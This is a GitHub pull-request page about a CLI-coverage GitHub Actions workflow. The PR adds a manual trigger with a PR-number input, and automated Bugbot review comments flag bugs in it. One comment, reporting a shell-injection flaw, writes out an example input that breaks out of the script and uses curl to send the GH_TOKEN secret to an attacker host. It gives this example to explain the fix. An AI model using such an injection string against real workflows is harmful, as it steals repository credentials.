Conversation
The previous prompt only checked recent commits and vaguely asked to identify coverage gaps. This update makes the prompt explicit about: 1. Reading api.md as the authoritative source of ALL SDK methods 2. Reading param structs from Go files to enumerate ALL options/fields 3. Building an SDK coverage matrix (methods + params) 4. Building a CLI coverage matrix (commands + flags) 5. Performing gap analysis to find missing commands and flags 6. Mapping guidance for SDK param fields to CLI flags (CamelCase -> kebab-case) This ensures the agent does a complete enumeration rather than just checking what changed in the most recent commit. Co-authored-by: mason <[email protected]>
|
Cursor Agent can help with this pull request. Just |
The workflow can now be triggered manually via workflow_dispatch with: - An optional pr_number input to specify a specific PR - If pr_number is not provided, uses the most recent merged PR - Falls back to HEAD if no PR is found This allows re-running the CLI coverage analysis for past PRs or triggering it manually without requiring a new push to main. Co-authored-by: mason <[email protected]>
![cursor[bot]](https://avatars.githubusercontent.com/in/1210556?s=60&v=4){kind=small}
There was a problem hiding this comment.
Cursor Bugbot has reviewed your changes and found 2 potential issues.
Bugbot Autofix is OFF. To automatically fix reported issues with Cloud Agents, enable Autofix in the Cursor dashboard.
| run: | | ||
| if [ -n "${{ inputs.pr_number }}" ]; then | ||
| # Use provided PR number | ||
| PR_NUMBER="${{ inputs.pr_number }}" |
There was a problem hiding this comment.
Shell injection via untrusted workflow dispatch input
Medium Severity
The inputs.pr_number value is directly interpolated into the shell script using ${{ inputs.pr_number }}. GitHub Actions performs string substitution before the shell parses the script, so a malicious input like "; curl attacker.com?t=$GH_TOKEN # would break out of the string context and execute arbitrary commands. This could exfiltrate the GH_TOKEN secret which is available in the step's environment. The safe pattern is to pass the input through an environment variable first (e.g., env: PR_INPUT: ${{ inputs.pr_number }} then use "$PR_INPUT" in the script).
| echo "Using most recent merged PR: $PR_NUMBER" | ||
| fi | ||
|
|
||
| if [ -z "$PR_NUMBER" ]; then |
There was a problem hiding this comment.
Empty array returns "null" string, not empty
Low Severity
When no merged PRs exist, gh pr list returns an empty array []. The jq expression .[0].number on an empty array returns null, which becomes the literal string "null" with raw output. The subsequent check if [ -z "$PR_NUMBER" ] tests for empty string, but "null" is not empty. This causes the script to incorrectly proceed to gh pr view "null", which fails. The jq expression needs // empty (like '.[0].number // empty') to output an empty string instead of "null".
2 participants
Enhance the CLI coverage workflow prompt to enforce full SDK method and CLI command enumeration for comprehensive gap analysis.
Note
Strengthens the CLI coverage updater workflow and makes it manually runnable with PR context.
workflow_dispatchwith optionalpr_number; fetches PR metadata (merge SHA, author, title) viaghand checks out the merge commit when providedversion; derives author from PR or push eventapi.md+ Go param structs) and CLI commands, building matrices and performing gap analysis (missing commands/flags)Written by Cursor Bugbot for commit b3020ea. This will update automatically on new commits. Configure here.